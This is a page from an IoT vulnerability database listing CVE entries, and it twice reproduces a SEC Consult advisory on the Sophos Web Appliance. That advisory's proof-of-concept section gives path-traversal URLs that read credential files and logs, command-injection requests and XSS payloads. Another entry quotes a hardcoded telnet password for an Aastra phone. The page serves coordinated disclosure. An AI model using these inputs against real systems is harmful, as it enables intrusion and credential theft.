VARIoT IoT vulnerabilities database


VAR-202001-0879 CVE-2013-2748 Belkin Wemo Switch Vulnerability in unlimited upload of dangerous types of files in CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Belkin Wemo Switch before WeMo_US_2.00.2176.PVT could allow remote attackers to upload arbitrary files onto the system. A vulnerability related to unrestricted upload of dangerous types of files exists in Belkin Wemo Switch. Information may be obtained or tampered with, and service operation may be interrupted (DoS). The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary firmware to the affected device; this can result in arbitrary code execution within the context of the vulnerable application.
VAR-201304-0023 CVE-2012-3022 Arbitrary program execution vulnerability in TrendLink ActiveX control CVSS V2: 8.5
CVSS V3: -
Severity: HIGH
The SaveToFile method in a certain ActiveX control in TrendDisplay.dll in Canary Labs TrendLink 9.0.2.27051 and earlier does not properly restrict the creation of files, which allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via a crafted web site. TrendLink provided by Canary Labs is a tool to help visualize data for analysis. The SaveToFile method provided in the ActiveX control in TrendLink contains a vulnerability where file creation is not properly restricted. Security Research and Service Institute - Information and Communication Security Technology Center (ICST), Taiwan R.O.C Kuang-Chun Hung reported this vulnerability to JPCERT/CC. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. A remote attacker may create an arbitrary file on the system and as a result, arbitrary code may be executed. Canary Labs Trend Link is prone to a vulnerability caused by an insecure method. Attackers can exploit this issue to overwrite arbitrary files in the context of the application (typically Internet Explorer) that is using the ActiveX control, which may aid in a remote code execution or cause denial-of-service conditions. Canary Labs Trend Link 9.0.2.27051 and prior versions are vulnerable. An attacker could exploit this vulnerability to write arbitrary content to arbitrary files.
VAR-201306-0351 CVE-2013-4632 Huawei AR Series Router DHCP Packet Parsing Denial of Service Vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
The Huawei Access Router (AR) before V200R002SPC003 allows remote attackers to cause a denial of service (device reset) via a crafted field in a DHCP request, as demonstrated by a request from an IP phone. Huawei AR Series Routers is a low-end router device introduced by Huawei. The Huawei AR series routers have an error in parsing the authentication and authorization fields in DHCP packets. A remote attacker can use the vulnerability to reset the device by sending specially crafted DHCP packets. To successfully exploit the vulnerability, the device needs to be used as a DHCP server. Successful exploitation of this vulnerability could result in a denial of service. Successfully exploiting this issue will result in a denial-of-service condition. Huawei AR V200R002C01SPC200 and prior versions are vulnerable. This product provides mobile and fixed network access methods, suitable for enterprise networks.
VAR-201304-0566 No CVE RuggedCom Rugged Operating System Security Bypass Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
RuggedCom Inc is the world's leading manufacturer of high-performance network and communications equipment for industrial environments. The Rugged Operating System Web API does not correctly verify permissions when executing commands, allowing remote attackers to execute certain commands with high permissions by operating the WebUI JavaScript.
VAR-201304-0569 No CVE RuggedCom Rugged Operating System Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
RuggedCom Inc is the world's leading manufacturer of high-performance network and communications equipment for industrial environments. An unknown bug exists in the Rugged Operating System that allows remote attackers to make the device unmanageable, resulting in a denial of service.
VAR-201304-0462 No CVE TP-Link TD-8817 Router Cross-Site Request Forgery Vulnerability CVSS V2: 3.5
CVSS V3: -
Severity: LOW
The TP-Link TD-8817 is an ADSL router device. TP-Link TD-8817 has a cross-site request forgery vulnerability that allows an attacker to build a malicious URI, entice a user to open it, and perform arbitrary operations in the target user's context, such as changing the administrator password. TP-LINK TD-8817 is an ADSL2+ Ethernet/USB modem router. A cross-site request forgery vulnerability exists in the TP-LINK TD-8817 router. An attacker could use this vulnerability to perform certain management operations and gain unauthorized access to the affected device.
VAR-201304-0146 CVE-2013-0683 plural Cogent Real-Time Systems Service disruption in products (DoS) Vulnerabilities CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
The DataSim and DataPid demonstration clients in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote servers to cause a denial of service (incorrect pointer access and client crash) via malformed data in a formatted text command. Cogent Real-Time Systems is a real-time data solutions vendor. If the user connects DataSim or DataPid to a server other than DataHub, and that server is designed to generate random or malformed messages, DataSim and DataPid will crash. Successfully exploiting this issue will result in a denial-of-service condition.
VAR-201304-0461 No CVE D-Link Multiple Product Command Injection Vulnerabilities CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
There is a command injection vulnerability in various D-Link router devices. DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 devices fail to properly verify dst parameter data and do not verify the session, allowing remote attackers to inject and execute arbitrary shell commands. DIR-600 / DIR-300 revB / DIR-815 / DIR-645 / DIR-412 / DIR-456 / DIR-110 devices also fail to properly restrict access to version.txt or DevInfo, allowing remote attackers to directly request the model name, hardware version, kernel version, firmware version and MAC address information. D-Link is a network company founded by Taiwan D-Link Group. It is committed to the research and development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. Command injection vulnerabilities and multiple information disclosure vulnerabilities exist in multiple D-Link products. An attacker could use these vulnerabilities to gain access to potentially sensitive information and execute arbitrary commands in the context of an affected device.
VAR-201304-0007 CVE-2012-4713 Rockwell Automation FactoryTalk Services Platform of RNADiagnostics.dll Integer sign error vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Integer signedness error in RNADiagnostics.dll in Rockwell Automation FactoryTalk Services Platform (FTSP) CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (service outage or RNADiagReceiver.exe daemon crash) via UDP data that specifies a negative integer value. The FactoryTalk Services Platform provides general services for products and applications in the FactoryTalk system (such as diagnostic information, health monitoring services, and real-time data access). The attacker can block subsequent connections and cause a denial of service. The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. FactoryTalk Services Platform is prone to a denial-of-service vulnerability. The following versions are vulnerable: FactoryTalk Services Platform CPR9, FactoryTalk Services Platform CPR9-SR1, FactoryTalk Services Platform CPR9-SR2, FactoryTalk Services Platform CPR9-SR3, FactoryTalk Services Platform CPR9-SR4, FactoryTalk Services Platform CPR9-SR5, FactoryTalk Services Platform CPR9-SR5.1, FactoryTalk Services Platform CPR9-SR6. The vulnerability is caused by the program not properly processing the data submitted by the user.
VAR-201304-0008 CVE-2012-4714 Rockwell Automation FactoryTalk Services Platform of RNADiagnostics.dll Integer overflow vulnerability CVSS V2: 7.8
CVSS V3: -
Severity: HIGH
Integer overflow in RNADiagnostics.dll in Rockwell Automation FactoryTalk Services Platform (FTSP) CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (service outage or RNADiagReceiver.exe daemon crash) via UDP data that specifies a large integer value. The FactoryTalk Services Platform provides general services for products and applications in the FactoryTalk system (such as diagnostic information, health monitoring services, and real-time data access). The attacker can block subsequent connections and cause a denial of service. The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. FactoryTalk Services Platform is prone to a denial-of-service vulnerability. The following versions are vulnerable: FactoryTalk Services Platform CPR9, FactoryTalk Services Platform CPR9-SR1, FactoryTalk Services Platform CPR9-SR2, FactoryTalk Services Platform CPR9-SR3, FactoryTalk Services Platform CPR9-SR4, FactoryTalk Services Platform CPR9-SR5, FactoryTalk Services Platform CPR9-SR5.1, FactoryTalk Services Platform CPR9-SR6.
VAR-201304-0153 CVE-2013-0681 plural Cogent DataHub Service disruption in products (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allow remote attackers to cause a denial of service (NULL pointer dereference and application crash) via malformed data in a formatted text command. Cogent Real-Time Systems is a real-time data solutions vendor. An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. The following Cogent Real-Time Systems products are vulnerable: Cogent DataHub 7.2.2 and prior versions; OPC DataHub 6.4.21 and prior versions; Cascade DataHub for Windows 6.4.21 and prior versions; Cogent DataHub DataSim and DataPid demonstration clients 7.2.2; OPC DataHub DataSim and DataPid demonstration clients 6.4.21; Cascade DataHub DataSim and DataPid demonstration clients 6.4.21; DataHub QuickTrend 7.2.2 and prior versions.
VAR-201304-0154 CVE-2013-0682 Cogent Real-Time Systems DataHub Text Command Buffer Overflow Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 do not properly handle exceptions, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via malformed data in a formatted text command, leading to out-of-bounds access to (1) heap or (2) stack memory. Cogent Real-Time Systems is a real-time data solutions vendor. The Cogent Real-Time Systems DataHub application receives formatted text commands over a TCP connection; these are parsed, verified, and executed within the application. An attacker can exploit this issue to execute arbitrary code within the context of the affected applications. Failed exploit attempts may crash the application, denying service to legitimate users. The following Cogent Real-Time Systems products are vulnerable: Cogent DataHub 7.2.2 and prior versions; OPC DataHub 6.4.21 and prior versions; Cascade DataHub for Windows 6.4.21 and prior versions; Cogent DataHub DataSim and DataPid demonstration clients 7.2.2; OPC DataHub DataSim and DataPid demonstration clients 6.4.21; Cascade DataHub DataSim and DataPid demonstration clients 6.4.21; DataHub QuickTrend 7.2.2 and prior versions.
VAR-201304-0496 No CVE Aastra 6753i IP Telephone Hardcoded Password Security Bypass Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
The Aastra 6753i IP Telephone is an IP telephony device. The Aastra 6753i IP Telephone includes a built-in "admin" account for telnet. Its password hashing algorithm is relatively simple. It can be easily extracted using the "vxworks_mem_search.rb" tool, one of which is "[M]qozn~". Using this account, an attacker can get shell access for denial of service and other attacks. Aastra 6753i IP Telephone 3.2.2.56 version has a security bypass vulnerability. An attacker could use this vulnerability to bypass security restrictions and perform unauthorized actions.
VAR-201304-0009 CVE-2012-4715 Rockwell Automation RSLinx Enterprise of LogReceiver.exe Vulnerable to buffer overflow CVSS V2: 10.0
CVSS V3: -
Severity: HIGH
Buffer overflow in LogReceiver.exe in Rockwell Automation RSLinx Enterprise CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a UDP packet with a certain integer length value that is (1) too large or (2) too small, leading to improper handling by Logger.dll. RSLinx Enterprise is a standard OPC server software that bridges the communication between RSView Server and PLC. RSLinx Enterprise (LogReceiver.exe and Logger.dll) does not process the input correctly. Receiving a very large packet can cause a logic error. An attacker who sends a packet containing a very large byte size to port 4444/UDP (user configurable, not enabled by default) can stop the service or possibly cause arbitrary code execution. The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. RSLinx Enterprise is prone to a denial-of-service vulnerability because the application fails to properly handle the input submitted to it. An attacker can exploit this issue to terminate the affected service of the vulnerable application, denying service to legitimate users. Due to the nature of this issue, code execution is possible but Symantec has not confirmed it. Note: This BID is being retired as a duplicate of the issue discussed in BID 58917 (RSLinx Enterprise 'Logger.dll' CVE-2012-4695 Denial of Service Vulnerability). The following versions are affected: RSLinx Enterprise CPR9-SR2, RSLinx Enterprise CPR9-SR3, RSLinx Enterprise CPR9-SR4, RSLinx Enterprise CPR9-SR5, RSLinx Enterprise CPR9-SR5.1, RSLinx Enterprise CPR9-SR6. This software can establish communication links for Allen-Bradley (AB) programmable controllers, various Rockwell software, and AB application software. A buffer overflow vulnerability exists in LogReceiver.exe in Rockwell Automation RSLinx Enterprise.
VAR-201304-0152 CVE-2013-0680 Cogent Real-Time Systems DataHub Remote Stack Buffer Overflow Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
Stack-based buffer overflow in the web server in Cogent Real-Time Systems Cogent DataHub before 7.3.0, OPC DataHub before 6.4.22, Cascade DataHub before 6.4.22 on Windows, and DataHub QuickTrend before 7.3.0 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP header. Cogent Real-Time Systems is a real-time data solutions vendor. An attacker can exploit this issue to execute arbitrary code within the context of the affected applications. Failed exploit attempts may crash the application, denying service to legitimate users. and prior OPC DataHub versions 6.4.21 and prior Cascade DataHub for Windows version 6.4.21 and prior Cogent DataHub DataSim and DataPid demonstration version 7.2.2 OPC DataHub DataSim and DataPid demonstration clients version 6.4.21 Cascade DataHub DataSim and DataPid demonstration clients version 6.4.21 DataHub QuickTrend version 7.2.2 and prior
VAR-201304-0005 CVE-2012-4695 Rockwell Automation RSLinx Enterprise of LogReceiver.exe Service disruption in (DoS) Vulnerabilities CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
LogReceiver.exe in Rockwell Automation RSLinx Enterprise CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1, and CPR9-SR6 allows remote attackers to cause a denial of service (service outage) via a zero-byte UDP packet that is not properly handled by Logger.dll. RSLinx Enterprise is a standard OPC server software that bridges the communication between RSView Server and PLC. RSLinx Enterprise (LogReceiver.exe and Logger.dll) does not process input correctly, and receiving a zero-byte packet can cause a logic error. A zero-byte packet sent by an attacker to port 4444/UDP (user configurable, not enabled by default) causes a denial of service when the service ignores the inbound request. The following products are affected by this vulnerability: CPR9, CPR9-SR1, CPR9-SR2, CPR9-SR3, CPR9-SR4, CPR9-SR5, CPR9-SR5.1 and CPR9-SR6. RSLinx Enterprise is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected application to crash, denying service to legitimate users. The following versions are vulnerable: RSLinx Enterprise CPR9, RSLinx Enterprise CPR9-SR1, RSLinx Enterprise CPR9-SR2, RSLinx Enterprise CPR9-SR3, RSLinx Enterprise CPR9-SR4, RSLinx Enterprise CPR9-SR5, RSLinx Enterprise CPR9-SR5.1, RSLinx Enterprise CPR9-SR6. This software can establish communication links for Allen-Bradley (AB) programmable controllers, various Rockwell software, and AB application software.
VAR-201304-0286 CVE-2013-1174 Cisco Hosted Collaboration Solution Service disruption in (DoS) Vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cisco Tivoli Business Service Manager (TBSM) in Hosted Collaboration Mediation (HCM) in Cisco Hosted Collaboration Solution allows remote attackers to cause a denial of service (temporary service hang) by sending many TCP packets to certain ports, aka Bug ID CSCue03703. The Cisco Prime Central for HCS Assurance is prone to a denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCue03703
VAR-201304-0401 CVE-2013-2763 Schneider Electric M340 PLC Module Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The Schneider Electric M340 PLC modules allow remote attackers to cause a denial of service (resource consumption) via unspecified vectors. NOTE: the vendor reportedly disputes this issue because it "could not be duplicated" and "an attacker could not remotely exploit this observed behavior to deny PLC control functions." ** Unsettled ** This case has not been confirmed as a vulnerability. Schneider Electric provides total solutions for the energy and infrastructure, industrial, data center and network, building and residential markets in more than 100 countries. The SESU tool used by several of these products is used to update software on Windows PC systems.
VAR-201403-0042 CVE-2013-2641 Sophos Web Appliance of patience.cgi Vulnerable to directory traversal CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in patience.cgi in Sophos Web Appliance before 3.7.8.2 allows remote attackers to read arbitrary files via the id parameter. This may aid in further attacks. Versions prior to Sophos Web Protection Appliance 3.7.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc.

SEC Consult Vulnerability Lab Security Advisory < 20130403-0 >
=======================================================================
title: Multiple vulnerabilities
product: Sophos Web Protection Appliance
vulnerable version: <= 3.7.8.1
fixed version: 3.7.8.2
impact: Critical
CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643
homepage: http://www.sophos.com/
found: 2013-01-14
by: Wolfgang Ettlinger
    SEC Consult Vulnerability Lab
    https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
"Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users."

URL: http://www.sophos.com/en-us/products/web/web-protection.aspx

Business recommendation:
------------------------
SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. Some components have been spot-checked, while others have not been tested at all.

An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks.

Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible.

If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling various attacks targeting clients (MITM, phishing, evilgrade, ...).

The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor.

Vulnerability overview/description:
-----------------------------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
Unauthenticated users can read arbitrary files from the filesystem with the privileges of the "spiderman" operating system user. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated.

2) OS command injection (CVE-2013-2642)
Authenticated users can execute arbitrary commands on the underlying operating system with the privileges of the "spiderman" operating system user. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds of locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration).

3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
Reflected Cross Site Scripting vulnerabilities were found. An attacker can use these vulnerabilities to exploit other vulnerabilities in the web interface or to conduct phishing attacks.

Proof of concept:
-----------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication:

https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00

Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users:

https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00

An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE").

<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

2) OS command injection (CVE-2013-2642)
The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`). These commands are run with the privileges of the operating system user "spiderman":

POST /index.php?c=diagnostic_tools HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 92
Cache-Control: no-cache

action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60

The "Local Site List" functionality allows injection of arbitrary OS commands:

POST /index.php?c=local_site_list_editor HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 205

STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1).

If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL:

https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60

3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
The following URLs demonstrate reflected Cross Site Scripting vulnerabilities:

https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E
https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d
https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E
https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E

As the application uses URL parameters to transmit session IDs rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes.

Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities. This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker.

Possible attack scenario: Use XSS to run malicious JavaScript in the browser of a user who has network access to the web interface. This code can:
- Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users.
- Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system.
- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM).

Vendor contact timeline:
------------------------
2013-02-22: Sending advisory and proof of concept exploit via encrypted channel.
2013-02-23: Vendor acknowledges receipt of advisory.
2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates.
2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule.
2013-03-18: Vendor starts rollout of update to "a first group of customers".
2013-04-03: SEC Consult releases coordinated security advisory.

More information can be found at:
http://www.sophos.com/en-us/support/knowledgebase/118969.aspx

Workaround:
-----------
No workaround available.

Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
http://blog.sec-consult.com

EOF Wolfgang Ettlinger, Stefan Viehböck / @2013
VAR-201403-0043 CVE-2013-2642 Sophos Web Appliance Vulnerable to arbitrary command execution CVSS V2: 9.3
CVSS V3: -
Severity: HIGH
Sophos Web Appliance before 3.7.8.2 allows (1) remote attackers to execute arbitrary commands via shell metacharacters in the client-ip parameter to the Block page, when using the user_workstation variable in a customized template, and remote authenticated users to execute arbitrary commands via shell metacharacters in the (2) url parameter to the Diagnostic Tools functionality or (3) entries parameter to the Local Site List functionality. Sophos Web Protection Appliance is prone to multiple command-injection vulnerabilities. Attackers can exploit these issues to disclose sensitive information and execute arbitrary commands with the privileges of the 'spiderman' operating system user. Web Protection Appliance 3.7.8.1 and prior versions are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. SEC Consult Vulnerability Lab Security Advisory < 20130403-0 > ======================================================================= title: Multiple vulnerabilities product: Sophos Web Protection Appliance vulnerable version: <= 3.7.8.1 fixed version: 3.7.8.2 impact: Critical CVE number: CVE-2013-2641, CVE-2013-2642, CVE-2013-2643 homepage: http://www.sophos.com/ found: 2013-01-14 by: Wolfgang Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- "Our award-winning Secure Web Gateway appliances make web protection easy. They are quick to setup, simple to manage and make policy administration a snap, even for non-technical users." URL: http://www.sophos.com/en-us/products/web/web-protection.aspx Business recommendation: ------------------------ SEC Consult has identified several vulnerabilities within the components of the Sophos Web Protection Appliance in the course of a short crash test. 
Some components have been spot-checked, while others have not been tested at all. An attacker can get unauthorized access to the appliance and plant backdoors or access configuration files containing credentials for other systems (eg. Active Directory/FTP login) which can be used in further attacks. Since all web traffic passes through the appliance, interception of HTTP as well as the plaintext form of HTTPS traffic (if HTTPS Scanning feature in use), including sensitive information like passwords and session Cookies is possible. If HTTPS Scanning is enabled, the appliance holds a private key for a Certificate Authority (CA) certificate that is installed/trusted on all workstations in the company. If this private key is compromised by an attacker, arbitrary certificates can be signed. These certificates will then pass validation on the client machines, enabling in various attacks targeting clients (MITM, phishing, evilgrade, ...). The recommendation of SEC Consult is to switch off the product until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the vendor. These files include configuration files containing sensitive information such as clear text passwords which can be used in other attacks. Furthermore the webserver log file which holds valid PHP session IDs can be accessed. With this information administrator users can be impersonated. This can be used to get persistent access to the affected system (eg. by planting backdoors), accessing all kinds locally stored information or intercepting web traffic that passes through the appliance. Unauthenticated users can exploit this kind of vulnerability too (depends on appliance configuration). 3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643) Reflected Cross Site Scripting vulnerabilities were found. 
An attacker can use these vulnerabilities to exploit other vulnerabilities in the web interface or to conduct phishing attacks.

Proof of concept:
-----------------
1) Unauthenticated local file disclosure (CVE-2013-2641)
As an example, an unauthenticated user can download the configuration file containing the salted hash of the administrator password as well as clear text passwords e.g. for FTP backup storage or Active Directory authentication:

https://<host>/cgi-bin/patience.cgi?id=../../persist/config/shared.conf%00

Furthermore the Apache access log can be retrieved. As PHP session IDs are passed via the URL rather than via Cookies, these can be found in this log file and effectively used to impersonate administrator users:

https://<host>/cgi-bin/patience.cgi?id=../../log/ui_access_log%00

An excerpt from the log file shows that it contains PHP session ID information (parameter "STYLE").

<host> - - [21/Feb/2013:17:02:17 +0000] "POST /index.php?c=dashboard HTTP/1.1" 200 139 "https://<host>/index.php?section=configuration&c=configuration&STYLE=8514d0a3c2fc9f8d47e2988076778153" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"

2) OS command injection (CVE-2013-2642)
The "Diagnostic Tools" functionality allows an authenticated user to inject arbitrary operating system commands enclosed in backticks (`).
These commands are run with the privileges of the operating system user "spiderman":

POST /index.php?c=diagnostic_tools HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 92
Cache-Control: no-cache

action=wget&section=configuration&STYLE=<valid session id>&url=%60sleep%205%60

The "Local Site List" functionality allows injection of arbitrary OS commands:

POST /index.php?c=local_site_list_editor HTTP/1.1
Host: <host>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 205

STYLE=<valid session id>&action=save&entries=[{"url"%3a+".'`sleep+10`'",+"range"%3a+"no",+"tld"%3a+"yes",+"valid_range"%3a+"no"}]

Note: Unauthenticated users can retrieve valid session IDs using the vulnerability in 1).

If a customized template for the "Block page" uses the variable "%%user_workstation%%", an _unauthenticated_ user can inject OS commands using the following URL:

https://<host>/end-user/index.php?reason=application&client-ip=%20%60sleep+10%60

3) Reflected Cross Site Scripting (XSS) (CVE-2013-2643)
The following URLs demonstrate reflected Cross Site Scripting vulnerabilities:

https://<host>/rss.php?action=allow&xss=%3Cscript%3Ealert%28String.fromCharCode%28120,%20115,%20115%29%29%3C/script%3E
https://<host>/end-user/errdoc.php?e=530&msg=PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ%2bCg%3d%3d
https://<host>/end-user/ftp_redirect.php?r=x&h=%3C/script%3E%3Cscript%3Ealert%281%29%3b%3C/script%3E
https://<host>/index.php?c=blocked&reason=malware&user=&&threat=%3Cscript%3Ealert%281%29%3C/script%3E

As the application uses URL parameters to transmit session IDs rather than cookies, session stealing attacks cannot be executed using these flaws. However, these vulnerabilities can still be used to fake login pages for phishing purposes. Furthermore the vulnerabilities in 1) and 2) can be exploited via one of the XSS vulnerabilities.
This enables attacks on the appliance even when the web interface would otherwise not be reachable to the attacker.

Possible attack scenario:
Use XSS to run malicious Javascript in the browser of a user who has network access to the web interface. This code can:
- Exploit the local file disclosure vulnerability (see 1) in order to gain access to valid session IDs and impersonate administrator users.
- Exploit the OS command injection (see 2) in order to execute arbitrary commands on the system.
- Exfiltrate sensitive information like HTTP, (plaintext) HTTPS traffic or the private key for the CA certificate used for HTTPS scanning (MITM).

Vendor contact timeline:
------------------------
2013-02-22: Sending advisory and proof of concept exploit via encrypted channel.
2013-02-23: Vendor acknowledges receipt of advisory.
2013-03-01: Vendor confirms reported issues and provides preliminary information about release dates.
2013-03-07: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule.
2013-03-18: Vendor starts rollout of update to "a first group of customers".
2013-04-03: SEC Consult releases coordinated security advisory.

More information can be found at:
http://www.sophos.com/en-us/support/knowledgebase/118969.aspx

Workaround:
-----------
No workaround available.

Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
https://www.sec-consult.com
http://blog.sec-consult.com

EOF Wolfgang Ettlinger, Stefan Viehböck / @2013
